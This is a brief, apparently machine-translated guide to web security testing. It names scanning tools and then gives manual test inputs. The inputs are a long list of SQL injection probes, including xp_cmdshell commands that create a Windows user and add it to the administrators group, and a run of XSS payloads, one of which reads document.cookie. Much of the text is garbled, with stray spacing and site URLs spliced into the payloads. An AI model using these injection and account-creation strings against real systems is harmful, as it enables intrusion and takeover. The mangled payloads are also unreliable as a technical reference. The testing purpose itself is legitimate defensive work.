Web Security Testing Method

Tool Scanning
Currently, web security scanners are mature in detecting XSS, SQL injection, OPEN redirect, and PHP File Include vulnerabilities.
Commercial Software web security scanner: Includes IBM Rational Appscan, WebInspect, Acunetix WVS
Free scanners: W3af, Skipfish, etc.
Based on the business funds, you can consider purchasing commercial scanning software, or use free software, each with its own advantages.
The home page can scan the website on a large scale. After the tool scans to confirm that there are no vulnerabilities or the vulnerabilities have been fixed, perform the following manual detection.
Manual Detection
For CSRF, unauthorized access, file upload, password modification, and other vulnerabilities, it is difficult to achieve automatic detection because these vulnerabilities involve system logic or business logic, sometimes human-computer interaction is required to participate in the page process. Therefore, manual testing is required to detect such vulnerabilities.
Manually checks whether the website URL and background login have SQL Injection

Admin -- 'Or ­ -- 'And () exec insert * % chr mid And 1 = 1; And 1 = 1; aNd 1 = 1; char (97) char (110) char (100) char (49) char (61) char (49 ); % 20AND % 201 = 2 'And 1 = 1;' And 1 = 1; 'aNd 1 = 1; And 1 = 2; 'and 1 = 2 And 2 = 2 And user> 0 And (select count (*) from sysobjects)> 0 And (select count (*) from msysobjects)> 0 And (Select Count (*) from Admin)> = 0 And (select top 1 len (username) from Admin)> 0 (known field of username) ; Exec master.. xp_cmdshell "net user name password/add "- ; Exec master.. xp_cmdshell "net localgroup name administrators/add "- And 0 <> (select count (*) from admin)

XSS: For URLs of get requests, the vulnerability scan software can scan for the XSS vulnerability. (But the software is not perfect, there are false positives, or omissions)
For POST requests (such as message boards, comments, and so on), the following test is required to input the information in the input box:

★~! @ Http://www.bkjia.com/article/201304/?#=&* () _ + <> ,./?; & Amp; http://www.bkjia.com/article/201304/42539; "[] {}\- ★% 3 Cinput/% 3E ★% 3 Cscript % 3 Ealert (& alert) % 3C/script % 3E ★ ★ ★★<Script> alert (& alert) </script> ★<Script> alert (& alert); </script> ★<Script> alert ('xss') </script> ★Javascript: alert (/xss /) ★Javascript: alert (/xss /) ★ ★ ★ ★= '> <Script> alert (document. cookie) </script> ★1. jpg "onmouseover =" alert (& alert ;) ★"> <Script> alert ('xsss'); </script> ★Http: // xxx & http://www.bkjia.com/Article/201304/#39;;alert (& domains ;);Var/A = & http://www.bkjia.com/Article/201304/#39;a ★'"> Xss & < ★"Onmouseover = alert (& alert ;);" ★& {Alert (& alert ;);} ★> "& Http://www.bkjia.com/article/201304/42539;> <script> alert ('xss & http://www.bkjia.com/article/201304/42539;) </script> ★> % 22% 27> ★> "& Http://www.bkjia.com/article/201304/42539;> ★AK % 22% 20 style % 3D % 22 background: url (javascript: alert (% 27XSS % 27) % 22% 20OS % 22 ★% 22% 2 Balert (% 27XSS % 27) % 2B % 22 ★ ★ ★ ★A? <Script> alert ('vulnerable') </script> ★